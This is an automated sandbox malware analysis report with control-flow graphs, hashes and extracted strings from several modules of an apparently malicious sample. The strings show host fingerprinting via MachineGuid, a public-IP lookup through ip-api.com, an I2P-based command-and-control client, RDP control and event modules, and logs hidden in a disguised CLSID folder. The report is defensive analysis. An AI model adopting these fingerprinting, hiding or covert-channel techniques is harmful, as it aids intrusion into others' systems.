                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                    • API String ID: 3828489143-883582248
                                                                    • Opcode ID: 3028c8487b4850c2a8afba3d3fc94739010c0dc3b44ea0e207f98bdf53cb8255
                                                                    • Instruction ID: 7c282bbee82bafe90567b4e7a44e0ebd147d0590c6287177b8491d22871f12c1
                                                                    • Opcode Fuzzy Hash: 3028c8487b4850c2a8afba3d3fc94739010c0dc3b44ea0e207f98bdf53cb8255
                                                                    • Instruction Fuzzy Hash: 06D15762E0C65B82FB208B14E4803B963A4AF85B95F654033D9CE576F6DE3DE885C781

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 937 7ff6bfd693f0-7ff6bfd6940a call 7ff6bfd61694 940 7ff6bfd69922 937->940 941 7ff6bfd69410-7ff6bfd69425 call 7ff6bfd61613 937->941 943 7ff6bfd69936-7ff6bfd6993b 940->943 946 7ff6bfd6947b 941->946 947 7ff6bfd69427-7ff6bfd69455 941->947 945 7ff6bfd6948d-7ff6bfd694a4 call 7ff6bfd699e2 943->945 951 7ff6bfd694a9-7ff6bfd694b6 945->951 948 7ff6bfd69480-7ff6bfd6948b FreeLibrary 946->948 955 7ff6bfd69457-7ff6bfd6945c 947->955 956 7ff6bfd6945e-7ff6bfd69479 call 7ff6bfd699e2 947->956 948->945 950 7ff6bfd694b7-7ff6bfd694f0 GetNativeSystemInfo GetWindowsDirectoryA 948->950 953 7ff6bfd694f6-7ff6bfd69517 GetLastError call 7ff6bfd699e2 950->953 954 7ff6bfd695ce-7ff6bfd695f1 call 7ff6bfd699e2 950->954 963 7ff6bfd69519 953->963 964 7ff6bfd69537-7ff6bfd6953d 953->964 954->945 965 7ff6bfd695f7-7ff6bfd6962d call 7ff6bfd65602 954->965 955->948 956->948 966 7ff6bfd6952d-7ff6bfd69532 963->966 967 7ff6bfd6951b-7ff6bfd69528 963->967 964->943 969 7ff6bfd69543-7ff6bfd69549 964->969 977 7ff6bfd69633-7ff6bfd69635 965->977 978 7ff6bfd696de-7ff6bfd696fa call 7ff6bfd699e2 965->978 966->945 967->966 971 7ff6bfd6954b-7ff6bfd6954e 969->971 972 7ff6bfd69582-7ff6bfd69588 969->972 973 7ff6bfd6956c-7ff6bfd69572 971->973 974 7ff6bfd69550-7ff6bfd69553 971->974 975 7ff6bfd6995e-7ff6bfd69963 972->975 976 7ff6bfd6958e-7ff6bfd69594 972->976 982 7ff6bfd69578-7ff6bfd6957d 973->982 983 7ff6bfd69954-7ff6bfd69959 973->983 980 7ff6bfd69559-7ff6bfd6955c 974->980 981 7ff6bfd69940-7ff6bfd69945 974->981 975->945 984 7ff6bfd6959a-7ff6bfd695a0 976->984 985 7ff6bfd69968-7ff6bfd6996d 976->985 977->945 979 7ff6bfd6963b-7ff6bfd69698 GetVolumeInformationA 977->979 993 7ff6bfd696ff 978->993 987 7ff6bfd6979b-7ff6bfd697cd call 7ff6bfd699e2 979->987 988 7ff6bfd6969e-7ff6bfd696c4 GetLastError call 7ff6bfd699e2 979->988 989 7ff6bfd6994a-7ff6bfd6994f 980->989 990 7ff6bfd69562-7ff6bfd69567 980->990 981->945 982->945 983->945 991 7ff6bfd695a6-7ff6bfd695ab 984->991 992 7ff6bfd69972-7ff6bfd69977 984->992 985->945 1000 7ff6bfd697e1-7ff6bfd697e8 987->1000 1001 7ff6bfd697cf-7ff6bfd697db strlen 987->1001 998 7ff6bfd696c6 988->998 999 7ff6bfd69704-7ff6bfd6970a 988->999 989->945 990->945 991->945 992->945 993->977 1002 7ff6bfd696cc-7ff6bfd696d9 998->1002 1003 7ff6bfd69853-7ff6bfd69858 998->1003 1004 7ff6bfd69867-7ff6bfd6986c 999->1004 1005 7ff6bfd69710 999->1005 1007 7ff6bfd697ec-7ff6bfd69849 call 7ff6bfd699e2 1000->1007 1001->1000 1006 7ff6bfd698a3-7ff6bfd698a7 1001->1006 1002->978 1003->945 1004->945 1009 7ff6bfd69749-7ff6bfd6974f 1005->1009 1010 7ff6bfd69712-7ff6bfd69715 1005->1010 1006->1000 1008 7ff6bfd698ad-7ff6bfd698b1 1006->1008 1017 7ff6bfd6984e 1007->1017 1008->1000 1014 7ff6bfd698b7-7ff6bfd698ea _errno call 7ff6bfd6e4f0 _errno 1008->1014 1012 7ff6bfd69755-7ff6bfd6975b 1009->1012 1013 7ff6bfd6988f-7ff6bfd69894 1009->1013 1015 7ff6bfd69717-7ff6bfd6971a 1010->1015 1016 7ff6bfd69733-7ff6bfd69739 1010->1016 1020 7ff6bfd69899-7ff6bfd6989e 1012->1020 1021 7ff6bfd69761-7ff6bfd69767 1012->1021 1013->945 1030 7ff6bfd698ec-7ff6bfd698ef 1014->1030 1031 7ff6bfd698fa-7ff6bfd6991d _errno call 7ff6bfd699e2 1014->1031 1023 7ff6bfd69720-7ff6bfd69723 1015->1023 1024 7ff6bfd69871-7ff6bfd69876 1015->1024 1018 7ff6bfd69885-7ff6bfd6988a 1016->1018 1019 7ff6bfd6973f-7ff6bfd69744 1016->1019 1017->951 1018->945 1019->945 1020->945 1025 7ff6bfd69769-7ff6bfd6976e 1021->1025 1026 7ff6bfd69773-7ff6bfd69778 1021->1026 1028 7ff6bfd6987b-7ff6bfd69880 1023->1028 1029 7ff6bfd69729-7ff6bfd6972e 1023->1029 1024->945 1025->945 1026->945 1028->945 1029->945 1030->1007 1032 7ff6bfd698f5 1030->1032 1031->1000 1032->1000
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                    • String ID: %$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$service$sys_init
                                                                    • API String ID: 3828489143-3798070276
                                                                    • Opcode ID: c298d8cbf015c6974a909995c04872e98ce01e6f146e4eb61ae2d7880d967112
                                                                    • Instruction ID: ed6e317a93753eac7b96c1ce1c0d93f7dbc0724b82c35da33a0162eeaabfbbfb
                                                                    • Opcode Fuzzy Hash: c298d8cbf015c6974a909995c04872e98ce01e6f146e4eb61ae2d7880d967112
                                                                    • Instruction Fuzzy Hash: EBD10661E0C653A1FB219BDCA4403B97360AF80794F654233EB4E9B2B4DE6DE945C3C2

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1035 7ffe1150330e-7ffe1150332e 1036 7ffe1150339c-7ffe115033a4 1035->1036 1037 7ffe11503330-7ffe11503338 1035->1037 1040 7ffe115033b7-7ffe115033cd call 7ffe1150464b 1036->1040 1041 7ffe115033a6-7ffe115033ab 1036->1041 1038 7ffe1150333a-7ffe11503341 1037->1038 1039 7ffe11503347-7ffe1150334f 1037->1039 1038->1039 1042 7ffe1150379b-7ffe115037b5 call 7ffe1150464b 1038->1042 1043 7ffe11503355-7ffe1150335d 1039->1043 1044 7ffe11503a6f 1039->1044 1050 7ffe11503a74-7ffe11503a85 1040->1050 1045 7ffe115033ad-7ffe115033b2 1041->1045 1046 7ffe115033d2-7ffe115033d7 1041->1046 1042->1039 1061 7ffe115037bb-7ffe115037c3 1042->1061 1048 7ffe11503372-7ffe1150337d 1043->1048 1049 7ffe1150335f-7ffe11503366 1043->1049 1044->1050 1045->1050 1053 7ffe115033d9-7ffe115033df 1046->1053 1054 7ffe11503406-7ffe1150358e call 7ffe11502800 call 7ffe11504170 call 7ffe11508684 1046->1054 1059 7ffe11503a86-7ffe11503a8b 1048->1059 1060 7ffe11503383-7ffe1150338c 1048->1060 1049->1048 1058 7ffe11503368-7ffe11503370 1049->1058 1053->1054 1056 7ffe115033e1-7ffe11503401 1053->1056 1090 7ffe11503594-7ffe115035c0 call 7ffe11504170 call 7ffe11508684 1054->1090 1091 7ffe11503701-7ffe11503730 call 7ffe11505fd5 1054->1091 1056->1050 1058->1048 1058->1060 1059->1050 1063 7ffe11503915-7ffe1150393b 1060->1063 1064 7ffe11503392-7ffe11503397 1060->1064 1067 7ffe115037c9-7ffe115037da 1061->1067 1068 7ffe1150384f-7ffe1150386a call 7ffe1150464b call 7ffe11502f80 1061->1068 1065 7ffe11503a8d-7ffe11503a92 1063->1065 1066 7ffe11503941-7ffe11503948 1063->1066 1064->1050 1065->1050 1070 7ffe1150394a-7ffe11503954 1066->1070 1071 7ffe11503957-7ffe1150397d GetProcessHeap HeapAlloc 1066->1071 1072 7ffe115037dc-7ffe115037f3 1067->1072 1073 7ffe115037f5-7ffe115037fe 1067->1073 1068->1050 1070->1071 1076 7ffe115039f1-7ffe11503a0c call 7ffe11501292 1071->1076 1077 7ffe1150397f-7ffe115039c1 memcpy call 7ffe1150aa07 1071->1077 1072->1068 1072->1073 1073->1068 1078 7ffe11503800-7ffe11503808 1073->1078 1076->1050 1097 7ffe115039c7 1077->1097 1098 7ffe11503a60-7ffe11503a63 1077->1098 1083 7ffe1150381d-7ffe11503828 1078->1083 1084 7ffe1150380a-7ffe11503811 1078->1084 1092 7ffe1150382a-7ffe11503832 1083->1092 1093 7ffe1150386f call 7ffe1150305e 1083->1093 1084->1083 1089 7ffe11503813-7ffe1150381b 1084->1089 1089->1083 1089->1092 1126 7ffe115035c6-7ffe115035d2 call 7ffe11504692 1090->1126 1127 7ffe1150374e-7ffe1150377d call 7ffe11505fd5 1090->1127 1091->1090 1111 7ffe11503736-7ffe11503749 call 7ffe1150ed50 1091->1111 1100 7ffe11503834-7ffe1150384a call 7ffe1150464b 1092->1100 1101 7ffe1150387e-7ffe11503898 call 7ffe1150464b 1092->1101 1103 7ffe11503874-7ffe11503879 1093->1103 1105 7ffe115039cc-7ffe115039cf 1097->1105 1107 7ffe11503a22-7ffe11503a24 1098->1107 1100->1050 1119 7ffe1150389a-7ffe1150389f 1101->1119 1120 7ffe115038a4-7ffe11503910 call 7ffe11502800 call 7ffe1150464b call 7ffe11509c52 1101->1120 1103->1050 1105->1050 1113 7ffe115039d5-7ffe115039ec GetProcessHeap HeapFree 1105->1113 1109 7ffe11503a26-7ffe11503a2e 1107->1109 1110 7ffe11503a35-7ffe11503a44 call 7ffe1150aa84 1107->1110 1109->1110 1116 7ffe11503a30-7ffe11503a33 1109->1116 1110->1097 1128 7ffe11503a46-7ffe11503a54 call 7ffe115032a5 1110->1128 1111->1090 1113->1050 1116->1110 1122 7ffe11503a0e-7ffe11503a1e call 7ffe1150aaf5 1116->1122 1119->1050 1120->1050 1122->1107 1138 7ffe115035d4-7ffe115035e9 1126->1138 1139 7ffe115035f1-7ffe11503607 call 7ffe11504818 1126->1139 1127->1126 1141 7ffe11503783-7ffe11503796 call 7ffe1150ed50 1127->1141 1144 7ffe11503a56-7ffe11503a5b 1128->1144 1145 7ffe11503a65-7ffe11503a6a 1128->1145 1138->1139 1151 7ffe1150362c-7ffe11503673 call 7ffe1150ac80 1139->1151 1152 7ffe11503609-7ffe11503625 1139->1152 1141->1126 1144->1105 1145->1105 1155 7ffe115036a7-7ffe115036af 1151->1155 1156 7ffe11503675-7ffe1150367d 1151->1156 1152->1151 1158 7ffe115036c8-7ffe115036fc call 7ffe11509c52 1155->1158 1159 7ffe115036b1-7ffe115036c2 GetProcessHeap HeapFree 1155->1159 1156->1155 1157 7ffe1150367f-7ffe1150369a call 7ffe11501770 1156->1157 1157->1155 1164 7ffe1150369c-7ffe115036a0 1157->1164 1158->1050 1159->1158 1164->1155
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $--TSCB--$-ILCCNC-$-ILCCNC-$-ILCCNC-$-VRSCNC-$/line?fields=query$AKAK$AKAK$KCIT$TGER$TPCR$[E] (%s) -> Memory allocation failed(size=%llu)$curl/8.4.0$h$ip-api.com$last-patch$mem_alloc$referrer
                                                                    • API String ID: 0-3139374006
                                                                    • Opcode ID: 912ed4a613681aaa6bc564396e5af2d4c00a87c057b5c2b355731a99e4a5451b
                                                                    • Instruction ID: 7c8c71759facfabf47bd66c5f48b798acbef30fad6c13caf4cb35b33190923a5
                                                                    • Opcode Fuzzy Hash: 912ed4a613681aaa6bc564396e5af2d4c00a87c057b5c2b355731a99e4a5451b
                                                                    • Instruction Fuzzy Hash: C3129F31A0CF8289E7A18B46E4843AE77A9EB84764F104279DA9D477F6DF7CE544CB00

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$strcat$HandleLibraryLoadModule
                                                                    • String ID: --conf=$--datadi$--reseed$.file=$C_InitI2P$C_StartI2P$Done$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$i2p$i2p$i2p.conf$i2p.su3$i2p.su3$i2p_init$libi2p.dll
                                                                    • API String ID: 1893813203-492052463
                                                                    • Opcode ID: ec477a8afcc3ffbe5cba8315cf09a0bb209ea99bf45b2283e1accf5b33ce7163
                                                                    • Instruction ID: 0665f89e8ac4d9cdefac9acc6d10181d14d0bcfd63acdd72924e977ac2d3810e
                                                                    • Opcode Fuzzy Hash: ec477a8afcc3ffbe5cba8315cf09a0bb209ea99bf45b2283e1accf5b33ce7163
                                                                    • Instruction Fuzzy Hash: 7271C071A0CF8291EB229B56F4403FE639AAB443A0F4411B5DA4D47BB9EF7CD549C740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$cnccli.l$debug_init$log$~
                                                                    • API String ID: 3395718042-315528054
                                                                    • Opcode ID: ca742bf4e2a3ff23386036bfd4bb469964a4852543b030b5e170109e5adcf0e1
                                                                    • Instruction ID: 79904c75f851a7976a5ee6ef39edc942ccde07faee7c5428420de02a07411379
                                                                    • Opcode Fuzzy Hash: ca742bf4e2a3ff23386036bfd4bb469964a4852543b030b5e170109e5adcf0e1
                                                                    • Instruction Fuzzy Hash: 2E515D50E0CF0395FB219793A8C43BC365EAF447A4F5850BAD90E0B6B2DF6DE9468742
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$evtsrv.l$log$~
                                                                    • API String ID: 3395718042-190452282
                                                                    • Opcode ID: 3d5c357b8a3488791b49d05f85c642e4e73c3433f412dce6f83d43bf693f2cba
                                                                    • Instruction ID: 14fafaeed59be1093009fec9f4141372676b142cc4a8ac52e53ca465f5a3cc0a
                                                                    • Opcode Fuzzy Hash: 3d5c357b8a3488791b49d05f85c642e4e73c3433f412dce6f83d43bf693f2cba
                                                                    • Instruction Fuzzy Hash: 6D516F50A0CE07CDFA109B43B8843BC2661AF35764F4042B2C52E7A7B7DE6DA987930D

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1256 7ffe0eb4143c-7ffe0eb41464 InitializeCriticalSectionAndSpinCount 1257 7ffe0eb41590-7ffe0eb415b1 GetLastError call 7ffe0eb41292 1256->1257 1258 7ffe0eb4146a-7ffe0eb4149e call 7ffe0eb41770 call 7ffe0eb4e0f1 1256->1258 1263 7ffe0eb415b3 1257->1263 1264 7ffe0eb415d2-7ffe0eb415d8 1257->1264 1271 7ffe0eb414a4-7ffe0eb414bb strlen 1258->1271 1272 7ffe0eb41569-7ffe0eb41581 call 7ffe0eb41292 1258->1272 1266 7ffe0eb41691-7ffe0eb41696 1263->1266 1267 7ffe0eb415b9-7ffe0eb415c6 1263->1267 1269 7ffe0eb415de-7ffe0eb415e4 1264->1269 1270 7ffe0eb4169b 1264->1270 1266->1272 1267->1264 1273 7ffe0eb41610-7ffe0eb41613 1269->1273 1274 7ffe0eb415e6-7ffe0eb415ec 1269->1274 1279 7ffe0eb416a5-7ffe0eb416aa 1270->1279 1275 7ffe0eb414d3-7ffe0eb414d6 1271->1275 1276 7ffe0eb414bd-7ffe0eb414c0 1271->1276 1288 7ffe0eb41586-7ffe0eb4158f 1272->1288 1281 7ffe0eb41615-7ffe0eb41618 1273->1281 1282 7ffe0eb4162d-7ffe0eb41633 1273->1282 1277 7ffe0eb415f2-7ffe0eb415f8 1274->1277 1278 7ffe0eb416b9-7ffe0eb416be 1274->1278 1286 7ffe0eb414f8-7ffe0eb41541 strlen fopen 1275->1286 1287 7ffe0eb414d8-7ffe0eb414f2 strcat strlen 1275->1287 1276->1275 1283 7ffe0eb414c2-7ffe0eb414cf strlen 1276->1283 1284 7ffe0eb415fe-7ffe0eb41604 1277->1284 1285 7ffe0eb416c3-7ffe0eb416c8 1277->1285 1278->1272 1279->1272 1289 7ffe0eb41687 1281->1289 1290 7ffe0eb4161a-7ffe0eb4161d 1281->1290 1291 7ffe0eb416af 1282->1291 1292 7ffe0eb41635-7ffe0eb4163a 1282->1292 1283->1275 1293 7ffe0eb4163f-7ffe0eb41644 1284->1293 1294 7ffe0eb41606-7ffe0eb4160b 1284->1294 1285->1272 1295 7ffe0eb41547-7ffe0eb41563 call 7ffe0eb41292 1286->1295 1296 7ffe0eb4165d-7ffe0eb41678 call 7ffe0eb41292 1286->1296 1287->1286 1289->1266 1290->1279 1297 7ffe0eb41623-7ffe0eb41628 1290->1297 1291->1278 1292->1272 1293->1272 1294->1272 1295->1272 1302 7ffe0eb416cd-7ffe0eb416e7 call 7ffe0eb41292 1295->1302 1296->1272 1297->1272 1302->1288
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$rdpctl.l$~
                                                                    • API String ID: 3395718042-1794035234
                                                                    • Opcode ID: c0500373ee09827ee142d1d9492b311746de8089aa615731dc60aa0a94030b99
                                                                    • Instruction ID: c656c0e953c543a6370e1b9f50561b62b8de1dd027137567ebb6e88f530c3396
                                                                    • Opcode Fuzzy Hash: c0500373ee09827ee142d1d9492b311746de8089aa615731dc60aa0a94030b99
                                                                    • Instruction Fuzzy Hash: AC517C91E1D70782FA30AF59A8803B92365EF04784F984032D9CE4A2B6DE6CF9C58F41

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1305 7ffe0ebd143c-7ffe0ebd1464 InitializeCriticalSectionAndSpinCount 1306 7ffe0ebd146a-7ffe0ebd149e call 7ffe0ebd9cc0 call 7ffe0ebd6dd1 1305->1306 1307 7ffe0ebd1590-7ffe0ebd15b1 GetLastError call 7ffe0ebd1292 1305->1307 1320 7ffe0ebd1569-7ffe0ebd1581 call 7ffe0ebd1292 1306->1320 1321 7ffe0ebd14a4-7ffe0ebd14bb strlen 1306->1321 1312 7ffe0ebd15d2-7ffe0ebd15d8 1307->1312 1313 7ffe0ebd15b3 1307->1313 1318 7ffe0ebd169b 1312->1318 1319 7ffe0ebd15de-7ffe0ebd15e4 1312->1319 1315 7ffe0ebd15b9-7ffe0ebd15c6 1313->1315 1316 7ffe0ebd1691-7ffe0ebd1696 1313->1316 1315->1312 1316->1320 1329 7ffe0ebd16a5-7ffe0ebd16aa 1318->1329 1322 7ffe0ebd15e6-7ffe0ebd15ec 1319->1322 1323 7ffe0ebd1610-7ffe0ebd1613 1319->1323 1333 7ffe0ebd1586-7ffe0ebd158f 1320->1333 1324 7ffe0ebd14bd-7ffe0ebd14c0 1321->1324 1325 7ffe0ebd14d3-7ffe0ebd14d6 1321->1325 1327 7ffe0ebd16b9-7ffe0ebd16be 1322->1327 1328 7ffe0ebd15f2-7ffe0ebd15f8 1322->1328 1330 7ffe0ebd162d-7ffe0ebd1633 1323->1330 1331 7ffe0ebd1615-7ffe0ebd1618 1323->1331 1324->1325 1332 7ffe0ebd14c2-7ffe0ebd14cf strlen 1324->1332 1336 7ffe0ebd14f8-7ffe0ebd1541 strlen fopen 1325->1336 1337 7ffe0ebd14d8-7ffe0ebd14f2 strcat strlen 1325->1337 1327->1320 1334 7ffe0ebd16c3-7ffe0ebd16c8 1328->1334 1335 7ffe0ebd15fe-7ffe0ebd1604 1328->1335 1329->1320 1340 7ffe0ebd1635-7ffe0ebd163a 1330->1340 1341 7ffe0ebd16af 1330->1341 1338 7ffe0ebd161a-7ffe0ebd161d 1331->1338 1339 7ffe0ebd1687 1331->1339 1332->1325 1334->1320 1342 7ffe0ebd1606-7ffe0ebd160b 1335->1342 1343 7ffe0ebd163f-7ffe0ebd1644 1335->1343 1344 7ffe0ebd165d-7ffe0ebd1678 call 7ffe0ebd1292 1336->1344 1345 7ffe0ebd1547-7ffe0ebd1563 call 7ffe0ebd1292 1336->1345 1337->1336 1338->1329 1346 7ffe0ebd1623-7ffe0ebd1628 1338->1346 1339->1316 1340->1320 1341->1327 1342->1320 1343->1320 1344->1320 1345->1320 1351 7ffe0ebd16cd-7ffe0ebd16e7 call 7ffe0ebd1292 1345->1351 1346->1320 1351->1333
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
